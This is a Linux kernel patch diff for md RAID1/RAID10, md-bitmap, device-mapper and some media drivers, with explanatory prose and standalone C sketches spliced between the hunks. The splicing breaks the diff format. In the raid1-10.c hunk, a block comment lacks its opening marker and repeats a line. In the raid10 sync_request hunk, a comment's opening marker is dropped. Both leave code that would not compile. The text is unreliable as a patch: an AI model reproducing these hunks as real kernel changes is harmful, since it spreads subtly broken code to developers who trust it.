+@@ -937,8 +935,7 @@ static int __remove_single_exception_chunk(struct dm_snapshot *s,
+ 
+ 	e = dm_lookup_exception(&s->complete, old_chunk);
+ 	if (!e) {
+-		DMERR("Corruption detected: exception for block %llu is "
+-		      "on disk but not in memory",
++		DMERR("Corruption detected: exception for block %llu is on disk but not in memory",
+ 		      (unsigned long long)old_chunk);
+ 		return -EINVAL;
+ 	}
+@@ -965,8 +962,7 @@ static int __remove_single_exception_chunk(struct dm_snapshot *s,
+ 		e->new_chunk++;
+ 	} else if (old_chunk != e->old_chunk +
+ 		   dm_consecutive_chunk_count(e)) {
+-		DMERR("Attempt to merge block %llu from the "
+-		      "middle of a chunk range [%llu - %llu]",
++		DMERR("Attempt to merge block %llu from the middle of a chunk range [%llu - %llu]",
+ 		      (unsigned long long)old_chunk,
+ 		      (unsigned long long)e->old_chunk,
+ 		      (unsigned long long)
+@@ -1059,8 +1055,7 @@ static void snapshot_merge_next_chunks(struct dm_snapshot *s)
+ 						      &new_chunk);
+ 	if (linear_chunks <= 0) {
+ 		if (linear_chunks < 0) {
+-			DMERR("Read error in exception store: "
+-			      "shutting down merge");
++			DMERR("Read error in exception store: shutting down merge");
+ 			down_write(&s->lock);
+ 			s->merge_failed = true;
+ 			up_write(&s->lock);
+@@ -2208,12 +2203,10 @@ static int snapshot_preresume(struct dm_target *ti)
+ 	if (snap_src && snap_dest) {
+ 		down_read(&snap_src->lock);
+ 		if (s == snap_src) {
+-			DMERR("Unable to resume snapshot source until "
+-			      "handover completes.");
++			DMERR("Unable to resume snapshot source until handover completes.");
+ 			r = -EINVAL;
+ 		} else if (!dm_suspended(snap_src->ti)) {
+-			DMERR("Unable to perform snapshot handover until "
+-			      "source is suspended.");
++			DMERR("Unable to perform snapshot handover until source is suspended.");
+ 			r = -EINVAL;
+ 		}
+ 		up_read(&snap_src->lock);
+@@ -2446,7 +2439,7 @@ static int __origin_write(struct list_head *snapshots, sector_t sector,
+ 	chunk_t chunk;
+ 
+ 	/* Do all the snapshots on this origin */
+-	list_for_each_entry (snap, snapshots, list) {
++	list_for_each_entry(snap, snapshots, list) {
+ 		/*
+ 		 * Don't make new exceptions in a merging snapshot
+ 		 * because it has effectively been deleted
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index a81ed080730a7..547aefe85c076 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -108,15 +108,13 @@ static int stripe_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 
+ 	width = ti->len;
+ 	if (sector_div(width, stripes)) {
+-		ti->error = "Target length not divisible by "
+-		    "number of stripes";
++		ti->error = "Target length not divisible by number of stripes";
+ 		return -EINVAL;
+ 	}
+ 
+ 	tmp_len = width;
+ 	if (sector_div(tmp_len, chunk_size)) {
+-		ti->error = "Target length not divisible by "
+-		    "chunk size";
++		ti->error = "Target length not divisible by chunk size";
+ 		return -EINVAL;
+ 	}
+ 
+@@ -124,15 +122,13 @@ static int stripe_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	 * Do we have enough arguments for that many stripes ?
+ 	 */
+ 	if (argc != (2 + 2 * stripes)) {
+-		ti->error = "Not enough destinations "
+-			"specified";
++		ti->error = "Not enough destinations specified";
+ 		return -EINVAL;
+ 	}
+ 
+ 	sc = kmalloc(struct_size(sc, stripe, stripes), GFP_KERNEL);
+ 	if (!sc) {
+-		ti->error = "Memory allocation for striped context "
+-		    "failed";
++		ti->error = "Memory allocation for striped context failed";
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 3acded2f976db..288f600ee56dc 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -211,7 +211,7 @@ static struct dm_dev_internal *find_device(struct list_head *l, dev_t dev)
+ {
+ 	struct dm_dev_internal *dd;
+ 
+-	list_for_each_entry (dd, l, list)
++	list_for_each_entry(dd, l, list)
+ 		if (dd->dm_dev->bdev->bd_dev == dev)
+ 			return dd;
+ 
+@@ -234,8 +234,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 		return 0;
+ 
+ 	if ((start >= dev_size) || (start + len > dev_size)) {
+-		DMERR("%s: %pg too small for target: "
+-		      "start=%llu, len=%llu, dev_size=%llu",
++		DMERR("%s: %pg too small for target: start=%llu, len=%llu, dev_size=%llu",
+ 		      dm_device_name(ti->table->md), bdev,
+ 		      (unsigned long long)start,
+ 		      (unsigned long long)len,
+@@ -280,8 +279,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 		return 0;
+ 
+ 	if (start & (logical_block_size_sectors - 1)) {
+-		DMERR("%s: start=%llu not aligned to h/w "
+-		      "logical block size %u of %pg",
++		DMERR("%s: start=%llu not aligned to h/w logical block size %u of %pg",
+ 		      dm_device_name(ti->table->md),
+ 		      (unsigned long long)start,
+ 		      limits->logical_block_size, bdev);
+@@ -289,8 +287,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 	}
+ 
+ 	if (len & (logical_block_size_sectors - 1)) {
+-		DMERR("%s: len=%llu not aligned to h/w "
+-		      "logical block size %u of %pg",
++		DMERR("%s: len=%llu not aligned to h/w logical block size %u of %pg",
+ 		      dm_device_name(ti->table->md),
+ 		      (unsigned long long)len,
+ 		      limits->logical_block_size, bdev);
+@@ -880,8 +877,7 @@ static int dm_table_determine_type(struct dm_table *t)
+ 			bio_based = 1;
+ 
+ 		if (bio_based && request_based) {
+-			DMERR("Inconsistent table: different target types"
+-			      " can't be mixed up");
++			DMERR("Inconsistent table: different target types can't be mixed up");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -1184,8 +1180,7 @@ static int dm_table_register_integrity(struct dm_table *t)
+ 	 * profile the new profile should not conflict.
+ 	 */
+ 	if (blk_integrity_compare(dm_disk(md), template_disk) < 0) {
+-		DMERR("%s: conflict with existing integrity profile: "
+-		      "%s profile mismatch",
++		DMERR("%s: conflict with existing integrity profile: %s profile mismatch",
+ 		      dm_device_name(t->md),
+ 		      template_disk->disk_name);
+ 		return 1;
+@@ -1698,8 +1693,7 @@ combine_limits:
+ 		 * for the table.
+ 		 */
+ 		if (blk_stack_limits(limits, &ti_limits, 0) < 0)
+-			DMWARN("%s: adding target device "
+-			       "(start sect %llu len %llu) "
++			DMWARN("%s: adding target device (start sect %llu len %llu) "
+ 			       "caused an alignment inconsistency",
+ 			       dm_device_name(t->md),
+ 			       (unsigned long long) ti->begin,
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 59eb1cb7037a0..4a0e15109997b 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -265,15 +265,15 @@ static int sb_check(struct dm_block_validator *v,
+ 	__le32 csum_le;
+ 
+ 	if (dm_block_location(b) != le64_to_cpu(disk_super->blocknr)) {
+-		DMERR("sb_check failed: blocknr %llu: "
+-		      "wanted %llu", le64_to_cpu(disk_super->blocknr),
++		DMERR("sb_check failed: blocknr %llu: wanted %llu",
++		      le64_to_cpu(disk_super->blocknr),
+ 		      (unsigned long long)dm_block_location(b));
+ 		return -ENOTBLK;
+ 	}
+ 
+ 	if (le64_to_cpu(disk_super->magic) != THIN_SUPERBLOCK_MAGIC) {
+-		DMERR("sb_check failed: magic %llu: "
+-		      "wanted %llu", le64_to_cpu(disk_super->magic),
++		DMERR("sb_check failed: magic %llu: wanted %llu",
++		      le64_to_cpu(disk_super->magic),
+ 		      (unsigned long long)THIN_SUPERBLOCK_MAGIC);
+ 		return -EILSEQ;
+ 	}
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index 2c9ba561fd8e9..12a5d4fb7d441 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -3,7 +3,7 @@
+  * Device Mapper Uevent Support
+  *
+  * Copyright IBM Corporation, 2007
+- * 	Author: Mike Anderson <andmike@linux.vnet.ibm.com>
++ *	Author: Mike Anderson <andmike@linux.vnet.ibm.com>
+  */
+ #ifndef DM_UEVENT_H
+ #define DM_UEVENT_H
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 431c84595ddb7..c6ff43a8f0b25 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -85,12 +85,12 @@ struct wc_entry {
+ 	unsigned short wc_list_contiguous;
+ 	bool write_in_progress
+ #if BITS_PER_LONG == 64
+-		:1
++		: 1
+ #endif
+ 	;
+ 	unsigned long index
+ #if BITS_PER_LONG == 64
+-		:47
++		: 47
+ #endif
+ 	;
+ 	unsigned long age;
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index c795ea7da7917..0548b5d925f74 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -1013,11 +1013,9 @@ static int dmz_check_sb(struct dmz_metadata *zmd, struct dmz_sb *dsb,
+ 	}
+ 
+ 	sb_block = le64_to_cpu(sb->sb_block);
+-	if (sb_block != (u64)dsb->zone->id << zmd->zone_nr_blocks_shift ) {
+-		dmz_dev_err(dev, "Invalid superblock position "
+-			    "(is %llu expected %llu)",
+-			    sb_block,
+-			    (u64)dsb->zone->id << zmd->zone_nr_blocks_shift);
++	if (sb_block != (u64)dsb->zone->id << zmd->zone_nr_blocks_shift) {
++		dmz_dev_err(dev, "Invalid superblock position (is %llu expected %llu)",
++			    sb_block, (u64)dsb->zone->id << zmd->zone_nr_blocks_shift);
+ 		return -EINVAL;
+ 	}
+ 	if (zmd->sb_version > 1) {
+@@ -1030,16 +1028,14 @@ static int dmz_check_sb(struct dmz_metadata *zmd, struct dmz_sb *dsb,
+ 		} else if (uuid_is_null(&zmd->uuid)) {
+ 			uuid_copy(&zmd->uuid, &sb_uuid);
+ 		} else if (!uuid_equal(&zmd->uuid, &sb_uuid)) {
+-			dmz_dev_err(dev, "mismatching DM-Zoned uuid, "
+-				    "is %pUl expected %pUl",
++			dmz_dev_err(dev, "mismatching DM-Zoned uuid, is %pUl expected %pUl",
+ 				    &sb_uuid, &zmd->uuid);
+ 			return -ENXIO;
+ 		}
+ 		if (!strlen(zmd->label))
+ 			memcpy(zmd->label, sb->dmz_label, BDEVNAME_SIZE);
+ 		else if (memcmp(zmd->label, sb->dmz_label, BDEVNAME_SIZE)) {
+-			dmz_dev_err(dev, "mismatching DM-Zoned label, "
+-				    "is %s expected %s",
++			dmz_dev_err(dev, "mismatching DM-Zoned label, is %s expected %s",
+ 				    sb->dmz_label, zmd->label);
+ 			return -ENXIO;
+ 		}
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index e7cc6ba1b657f..8bbeeec70905c 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -54,14 +54,7 @@ __acquires(bitmap->lock)
+ {
+ 	unsigned char *mappage;
+ 
+-	if (page >= bitmap->pages) {
+-		/* This can happen if bitmap_start_sync goes beyond
+-		 * End-of-device while looking for a whole page.
+-		 * It is harmless.
+-		 */
+-		return -EINVAL;
+-	}
+-
++	WARN_ON_ONCE(page >= bitmap->pages);
+ 	if (bitmap->bp[page].hijacked) /* it's hijacked, don't try to alloc */
+ 		return 0;
+ 
+@@ -1000,7 +993,6 @@ static int md_bitmap_file_test_bit(struct bitmap *bitmap, sector_t block)
+ 	return set;
+ }
+ 
+-
+ /* this gets called when the md device is ready to unplug its underlying
+  * (slave) device queues -- before we let any writes go down, we need to
+  * sync the dirty pages of the bitmap file to disk */
+@@ -1010,8 +1002,7 @@ void md_bitmap_unplug(struct bitmap *bitmap)
+ 	int dirty, need_write;
+ 	int writing = 0;
+ 
+-	if (!bitmap || !bitmap->storage.filemap ||
+-	    test_bit(BITMAP_STALE, &bitmap->flags))
++	if (!md_bitmap_enabled(bitmap))
+ 		return;
+ 
+ 	/* look at each page to see if there are any set bits that need to be
+@@ -1364,6 +1355,14 @@ __acquires(bitmap->lock)
+ 	sector_t csize;
+ 	int err;
+ 
++	if (page >= bitmap->pages) {
++		/*
++		 * This can happen if bitmap_start_sync goes beyond
++		 * End-of-device while looking for a whole page, or if
++		 * the user wrote a huge number to the bitmap_set_bits
++		 * sysfs attribute.
++		 */
++		return NULL;
++	}
+ 	err = md_bitmap_checkpage(bitmap, page, create, 0);
+ 
+ 	if (bitmap->bp[page].hijacked ||
+diff --git a/drivers/md/md-bitmap.h b/drivers/md/md-bitmap.h
+index cfd7395de8fd3..3a4750952b3a7 100644
+--- a/drivers/md/md-bitmap.h
++++ b/drivers/md/md-bitmap.h
+@@ -273,6 +273,13 @@ int md_bitmap_copy_from_slot(struct mddev *mddev, int slot,
+ 			     sector_t *lo, sector_t *hi, bool clear_bits);
+ void md_bitmap_free(struct bitmap *bitmap);
+ void md_bitmap_wait_behind_writes(struct mddev *mddev);
++
++static inline bool md_bitmap_enabled(struct bitmap *bitmap)
++{
++	return bitmap && bitmap->storage.filemap &&
++	       !test_bit(BITMAP_STALE, &bitmap->flags);
++}
++
+ #endif
+ 
+ #endif
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index bb73a541bb193..829e1bd9bcbf9 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3830,8 +3830,9 @@ int strict_strtoul_scaled(const char *cp, unsigned long *res, int scale)
+ static ssize_t
+ safe_delay_show(struct mddev *mddev, char *page)
+ {
+-	int msec = (mddev->safemode_delay*1000)/HZ;
+-	return sprintf(page, "%d.%03d\n", msec/1000, msec%1000);
++	unsigned int msec = ((unsigned long)mddev->safemode_delay*1000)/HZ;
++
++	return sprintf(page, "%u.%03u\n", msec/1000, msec%1000);
+ }
+ static ssize_t
+ safe_delay_store(struct mddev *mddev, const char *cbuf, size_t len)
+@@ -3843,7 +3844,7 @@ safe_delay_store(struct mddev *mddev, const char *cbuf, size_t len)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (strict_strtoul_scaled(cbuf, &msec, 3) < 0)
++	if (strict_strtoul_scaled(cbuf, &msec, 3) < 0 || msec > UINT_MAX / HZ)
+ 		return -EINVAL;
+ 	if (msec == 0)
+ 		mddev->safemode_delay = 0;
+@@ -4512,6 +4513,8 @@ max_corrected_read_errors_store(struct mddev *mddev, const char *buf, size_t len
+ 	rv = kstrtouint(buf, 10, &n);
+ 	if (rv < 0)
+ 		return rv;
++	if (n > INT_MAX)
++		return -EINVAL;
+ 	atomic_set(&mddev->max_corr_read_errors, n);
+ 	return len;
+ }
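
Both safe_delay hunks guard the same arithmetic: converting between
milliseconds and jiffies with 32-bit intermediates can wrap. A stand-alone
sketch of the widened show path and the bounded store path (the HZ value and
the rounding here are illustrative):

#include <stdio.h>
#include <stdint.h>
#include <limits.h>

#define HZ 1000U	/* illustrative; the kernel's HZ is config-dependent */

/* Store path: reject values whose msec * HZ product would overflow. */
static int msec_to_jiffies_checked(unsigned long msec, unsigned long *out)
{
	if (msec > UINT_MAX / HZ)
		return -1;
	*out = msec * HZ / 1000;
	return 0;
}

/* Show path: widen before multiplying, as safe_delay_show() now does. */
static unsigned int jiffies_to_msec(unsigned long delay)
{
	return (unsigned int)((uint64_t)delay * 1000 / HZ);
}

int main(void)
{
	unsigned long j;

	if (msec_to_jiffies_checked(200, &j) == 0)
		printf("200 ms -> %lu jiffies -> %u ms\n",
		       j, jiffies_to_msec(j));
	if (msec_to_jiffies_checked(4294968UL, &j) < 0)	/* > UINT_MAX/HZ */
		printf("overflowing value rejected\n");
	return 0;
}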
+diff --git a/drivers/md/raid1-10.c b/drivers/md/raid1-10.c
+index e61f6cad4e08e..e0c8ac8146331 100644
+--- a/drivers/md/raid1-10.c
++++ b/drivers/md/raid1-10.c
+@@ -109,3 +109,45 @@ static void md_bio_reset_resync_pages(struct bio *bio, struct resync_pages *rp,
+ 		size -= len;
+ 	} while (idx++ < RESYNC_PAGES && size > 0);
+ }
++
++
++static inline void raid1_submit_write(struct bio *bio)
++{
++	struct md_rdev *rdev = (void *)bio->bi_bdev;
++
++	bio->bi_next = NULL;
++	bio_set_dev(bio, rdev->bdev);
++	if (test_bit(Faulty, &rdev->flags))
++		bio_io_error(bio);
++	else if (unlikely(bio_op(bio) ==  REQ_OP_DISCARD &&
++			  !bdev_max_discard_sectors(bio->bi_bdev)))
++		/* Just ignore it */
++		bio_endio(bio);
++	else
++		submit_bio_noacct(bio);
++}
++
++static inline bool raid1_add_bio_to_plug(struct mddev *mddev, struct bio *bio,
++				      blk_plug_cb_fn unplug)
++{
++	struct raid1_plug_cb *plug = NULL;
++	struct blk_plug_cb *cb;
++
++	 * If the bitmap is not enabled, it's safe to submit the IO
++	 * directly, which gives optimal performance.
++	 * this can get optimal performance.
++	 */
++	if (!md_bitmap_enabled(mddev->bitmap)) {
++		raid1_submit_write(bio);
++		return true;
++	}
++
++	cb = blk_check_plugged(unplug, mddev, sizeof(*plug));
++	if (!cb)
++		return false;
++
++	plug = container_of(cb, struct raid1_plug_cb, cb);
++	bio_list_add(&plug->pending, bio);
++
++	return true;
++}
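
raid1_add_bio_to_plug() centralizes one decision that raid1 and raid10 both
need: with no bitmap there is nothing to batch writes for, so the bio is
submitted immediately; otherwise it is parked on the plug list for a later
flush. A reduced stand-alone model of that dispatch (all types here are
stand-ins for the kernel ones):

#include <stdio.h>
#include <stdbool.h>
#include <stddef.h>

struct bio { int id; struct bio *next; };

struct plug { struct bio *pending; };

static void submit_write(struct bio *bio)
{
	printf("submit bio %d directly\n", bio->id);
}

static bool add_bio_to_plug(struct plug *plug, bool bitmap_enabled,
			    struct bio *bio)
{
	/* no bitmap: skip the batching machinery entirely */
	if (!bitmap_enabled) {
		submit_write(bio);
		return true;
	}
	if (!plug)			/* blk_check_plugged() failed */
		return false;

	bio->next = plug->pending;	/* bio_list_add() stand-in */
	plug->pending = bio;
	return true;
}

int main(void)
{
	struct plug plug = { .pending = NULL };
	struct bio a = { 1, NULL }, b = { 2, NULL };

	add_bio_to_plug(&plug, false, &a);	/* submitted immediately */
	add_bio_to_plug(&plug, true, &b);	/* parked on the plug list */
	printf("plugged bio: %d\n", plug.pending ? plug.pending->id : -1);
	return 0;
}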
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 58f705f429480..ac64c587191b9 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -799,17 +799,8 @@ static void flush_bio_list(struct r1conf *conf, struct bio *bio)
+ 
+ 	while (bio) { /* submit pending writes */
+ 		struct bio *next = bio->bi_next;
+-		struct md_rdev *rdev = (void *)bio->bi_bdev;
+-		bio->bi_next = NULL;
+-		bio_set_dev(bio, rdev->bdev);
+-		if (test_bit(Faulty, &rdev->flags)) {
+-			bio_io_error(bio);
+-		} else if (unlikely((bio_op(bio) == REQ_OP_DISCARD) &&
+-				    !bdev_max_discard_sectors(bio->bi_bdev)))
+-			/* Just ignore it */
+-			bio_endio(bio);
+-		else
+-			submit_bio_noacct(bio);
++
++		raid1_submit_write(bio);
+ 		bio = next;
+ 		cond_resched();
+ 	}
+@@ -1343,8 +1334,6 @@ static void raid1_write_request(struct mddev *mddev, struct bio *bio,
+ 	struct bitmap *bitmap = mddev->bitmap;
+ 	unsigned long flags;
+ 	struct md_rdev *blocked_rdev;
+-	struct blk_plug_cb *cb;
+-	struct raid1_plug_cb *plug = NULL;
+ 	int first_clone;
+ 	int max_sectors;
+ 	bool write_behind = false;
+@@ -1573,15 +1562,7 @@ static void raid1_write_request(struct mddev *mddev, struct bio *bio,
+ 					      r1_bio->sector);
+ 		/* flush_pending_writes() needs access to the rdev so...*/
+ 		mbio->bi_bdev = (void *)rdev;
+-
+-		cb = blk_check_plugged(raid1_unplug, mddev, sizeof(*plug));
+-		if (cb)
+-			plug = container_of(cb, struct raid1_plug_cb, cb);
+-		else
+-			plug = NULL;
+-		if (plug) {
+-			bio_list_add(&plug->pending, mbio);
+-		} else {
++		if (!raid1_add_bio_to_plug(mddev, mbio, raid1_unplug)) {
+ 			spin_lock_irqsave(&conf->device_lock, flags);
+ 			bio_list_add(&conf->pending_bio_list, mbio);
+ 			spin_unlock_irqrestore(&conf->device_lock, flags);
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 67398394cc9c9..d2098fcd6a270 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -325,7 +325,7 @@ static void raid_end_bio_io(struct r10bio *r10_bio)
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state))
+ 		bio->bi_status = BLK_STS_IOERR;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (r10_bio->start_time)
+ 		bio_end_io_acct(bio, r10_bio->start_time);
+ 	bio_endio(bio);
+ 	/*
+@@ -779,8 +779,16 @@ static struct md_rdev *read_balance(struct r10conf *conf,
+ 		disk = r10_bio->devs[slot].devnum;
+ 		rdev = rcu_dereference(conf->mirrors[disk].replacement);
+ 		if (rdev == NULL || test_bit(Faulty, &rdev->flags) ||
+-		    r10_bio->devs[slot].addr + sectors > rdev->recovery_offset)
++		    r10_bio->devs[slot].addr + sectors >
++		    rdev->recovery_offset) {
++			/*
++			 * Read the replacement first to prevent reading both
++			 * rdev and replacement as NULL while the replacement
++			 * replaces rdev.
++			 */
++			smp_mb();
+ 			rdev = rcu_dereference(conf->mirrors[disk].rdev);
++		}
+ 		if (rdev == NULL ||
+ 		    test_bit(Faulty, &rdev->flags))
+ 			continue;
+@@ -909,17 +917,8 @@ static void flush_pending_writes(struct r10conf *conf)
+ 
+ 		while (bio) { /* submit pending writes */
+ 			struct bio *next = bio->bi_next;
+-			struct md_rdev *rdev = (void*)bio->bi_bdev;
+-			bio->bi_next = NULL;
+-			bio_set_dev(bio, rdev->bdev);
+-			if (test_bit(Faulty, &rdev->flags)) {
+-				bio_io_error(bio);
+-			} else if (unlikely((bio_op(bio) ==  REQ_OP_DISCARD) &&
+-					    !bdev_max_discard_sectors(bio->bi_bdev)))
+-				/* Just ignore it */
+-				bio_endio(bio);
+-			else
+-				submit_bio_noacct(bio);
++
++			raid1_submit_write(bio);
+ 			bio = next;
+ 		}
+ 		blk_finish_plug(&plug);
+@@ -1128,17 +1127,8 @@ static void raid10_unplug(struct blk_plug_cb *cb, bool from_schedule)
+ 
+ 	while (bio) { /* submit pending writes */
+ 		struct bio *next = bio->bi_next;
+-		struct md_rdev *rdev = (void*)bio->bi_bdev;
+-		bio->bi_next = NULL;
+-		bio_set_dev(bio, rdev->bdev);
+-		if (test_bit(Faulty, &rdev->flags)) {
+-			bio_io_error(bio);
+-		} else if (unlikely((bio_op(bio) ==  REQ_OP_DISCARD) &&
+-				    !bdev_max_discard_sectors(bio->bi_bdev)))
+-			/* Just ignore it */
+-			bio_endio(bio);
+-		else
+-			submit_bio_noacct(bio);
++
++		raid1_submit_write(bio);
+ 		bio = next;
+ 	}
+ 	kfree(plug);
+@@ -1280,8 +1270,6 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 	const blk_opf_t do_sync = bio->bi_opf & REQ_SYNC;
+ 	const blk_opf_t do_fua = bio->bi_opf & REQ_FUA;
+ 	unsigned long flags;
+-	struct blk_plug_cb *cb;
+-	struct raid1_plug_cb *plug = NULL;
+ 	struct r10conf *conf = mddev->private;
+ 	struct md_rdev *rdev;
+ 	int devnum = r10_bio->devs[n_copy].devnum;
+@@ -1321,14 +1309,7 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 
+ 	atomic_inc(&r10_bio->remaining);
+ 
+-	cb = blk_check_plugged(raid10_unplug, mddev, sizeof(*plug));
+-	if (cb)
+-		plug = container_of(cb, struct raid1_plug_cb, cb);
+-	else
+-		plug = NULL;
+-	if (plug) {
+-		bio_list_add(&plug->pending, mbio);
+-	} else {
++	if (!raid1_add_bio_to_plug(mddev, mbio, raid10_unplug)) {
+ 		spin_lock_irqsave(&conf->device_lock, flags);
+ 		bio_list_add(&conf->pending_bio_list, mbio);
+ 		spin_unlock_irqrestore(&conf->device_lock, flags);
+@@ -1477,9 +1458,15 @@ static void raid10_write_request(struct mddev *mddev, struct bio *bio,
+ 
+ 	for (i = 0;  i < conf->copies; i++) {
+ 		int d = r10_bio->devs[i].devnum;
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[d].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[d].replacement);
++		struct md_rdev *rdev, *rrdev;
++
++		rrdev = rcu_dereference(conf->mirrors[d].replacement);
++		/*
++		 * Read the replacement first to prevent reading both rdev
++		 * and replacement as NULL while the replacement replaces rdev.
++		 */
++		smp_mb();
++		rdev = rcu_dereference(conf->mirrors[d].rdev);
+ 		if (rdev == rrdev)
+ 			rrdev = NULL;
+ 		if (rdev && (test_bit(Faulty, &rdev->flags)))
+@@ -3436,7 +3423,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 			int must_sync;
+ 			int any_working;
+ 			int need_recover = 0;
+-			int need_replace = 0;
+ 			struct raid10_info *mirror = &conf->mirrors[i];
+ 			struct md_rdev *mrdev, *mreplace;
+ 
+@@ -3448,11 +3434,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 			    !test_bit(Faulty, &mrdev->flags) &&
+ 			    !test_bit(In_sync, &mrdev->flags))
+ 				need_recover = 1;
+-			if (mreplace != NULL &&
+-			    !test_bit(Faulty, &mreplace->flags))
+-				need_replace = 1;
++			if (mreplace && test_bit(Faulty, &mreplace->flags))
++				mreplace = NULL;
+ 
+-			if (!need_recover && !need_replace) {
++			if (!need_recover && !mreplace) {
+ 				rcu_read_unlock();
+ 				continue;
+ 			}
+@@ -3468,8 +3453,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 				rcu_read_unlock();
+ 				continue;
+ 			}
+-			if (mreplace && test_bit(Faulty, &mreplace->flags))
+-				mreplace = NULL;
+ 			/* Unless we are doing a full sync, or a replacement
+ 			 * we only need to recover the block if it is set in
+ 			 * the bitmap
+@@ -3592,11 +3575,11 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 				bio = r10_bio->devs[1].repl_bio;
+ 				if (bio)
+ 					bio->bi_end_io = NULL;
+-				/* Note: if need_replace, then bio
++				 * Note: if mreplace is not NULL, then bio
+ 				 * cannot be NULL as r10buf_pool_alloc will
+ 				 * have allocated it.
+ 				 */
+-				if (!need_replace)
++				if (!mreplace)
+ 					break;
+ 				bio->bi_next = biolist;
+ 				biolist = bio;
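
The smp_mb() added in both raid10 hunks orders the reader against the
replacement hand-over, which publishes the replacement as ->rdev before
clearing ->replacement; loading ->replacement first and ->rdev second, with a
barrier in between, means a reader can never observe both as NULL. A C11
sketch of the reader side only (the mirror struct and the fence strength are
illustrative):

#include <stdatomic.h>
#include <stdio.h>

struct mirror {
	_Atomic(void *) rdev;
	_Atomic(void *) replacement;
};

static void *pick_device(struct mirror *m)
{
	void *dev = atomic_load_explicit(&m->replacement,
					 memory_order_relaxed);

	if (!dev) {
		/* pairs with the writer's barrier between its two stores */
		atomic_thread_fence(memory_order_seq_cst);
		dev = atomic_load_explicit(&m->rdev, memory_order_relaxed);
	}
	return dev;
}

int main(void)
{
	int disk;
	struct mirror m;

	atomic_init(&m.rdev, NULL);
	atomic_init(&m.replacement, &disk);
	printf("picked %p\n", pick_device(&m));
	return 0;
}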
+diff --git a/drivers/media/cec/i2c/Kconfig b/drivers/media/cec/i2c/Kconfig
+index 70432a1d69186..d912d143fb312 100644
+--- a/drivers/media/cec/i2c/Kconfig
++++ b/drivers/media/cec/i2c/Kconfig
+@@ -5,6 +5,7 @@
+ config CEC_CH7322
+ 	tristate "Chrontel CH7322 CEC controller"
+ 	depends on I2C
++	select REGMAP
+ 	select REGMAP_I2C
+ 	select CEC_CORE
+ 	help
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 306dc35e925fd..f8709cdf28b39 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1353,7 +1353,8 @@ static int hi846_set_ctrl(struct v4l2_ctrl *ctrl)
+ 					 exposure_max);
+ 	}
+ 
+-	if (!pm_runtime_get_if_in_use(&client->dev))
++	ret = pm_runtime_get_if_in_use(&client->dev);
++	if (!ret || ret == -EAGAIN)
+ 		return 0;
+ 
+ 	switch (ctrl->id) {
+diff --git a/drivers/media/i2c/st-mipid02.c b/drivers/media/i2c/st-mipid02.c
+index 31b89aff0e86a..f20f87562bf11 100644
+--- a/drivers/media/i2c/st-mipid02.c
++++ b/drivers/media/i2c/st-mipid02.c
+@@ -736,8 +736,13 @@ static void mipid02_set_fmt_source(struct v4l2_subdev *sd,
+ {
+ 	struct mipid02_dev *bridge = to_mipid02_dev(sd);
+ 
+-	/* source pad mirror active sink pad */
+-	format->format = bridge->fmt;
++	/* source pad mirrors the sink pad */
++	if (format->which == V4L2_SUBDEV_FORMAT_ACTIVE)
++		format->format = bridge->fmt;
++	else
++		format->format = *v4l2_subdev_get_try_format(sd, sd_state,
++							     MIPID02_SINK_0);
++
+ 	/* but code may need to be converted */
+ 	format->format.code = serial_to_parallel_code(format->format.code);
+ 
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index 4918547793dc1..c08b5a2bfc1df 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -229,6 +229,7 @@ static void vdec_handle_resolution_change(struct vpu_inst *inst)
+ 
